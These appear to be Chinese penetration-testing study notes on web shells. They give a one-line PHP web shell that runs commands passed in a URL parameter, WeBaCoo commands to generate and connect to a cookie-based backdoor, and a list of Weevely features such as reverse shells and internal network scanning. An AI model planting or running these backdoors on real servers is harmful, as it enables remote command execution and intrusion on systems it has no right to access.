WebShell

  • <?php echo shell_exec($_GET[‘cmd’]);?>
  • 中国菜刀:http://www.maicaidao.co
  • 可能被IDS、AV、WAF、扫描器软件发现查杀

webacoo

  • WeBaCoo(Web Backdoor Cookie)
    • 类终端的shell
    • 编码通信内容通过cookie头传输,隐蔽性较强
    • cm:base64编码的命令
    • cn:服务器用于返回数据的cookie头的名
    • cp:返回信息定界符
  • 生成服务端
    • webacoo -g -o a.php
    • webacoo-t -u http://1.1.1.1/a.php

weevely

  • 隐蔽的类终端php webshell
  • 30多个管理模块
    • 执行系统命令、浏览文件系统
    • 检查服务器常见配置错误
    • 创建正向、反向TCPshell连接
    • 通过目标计算机代理http流量
    • 从目标计算机运行端口扫描,渗透内网
  • 支持连接密码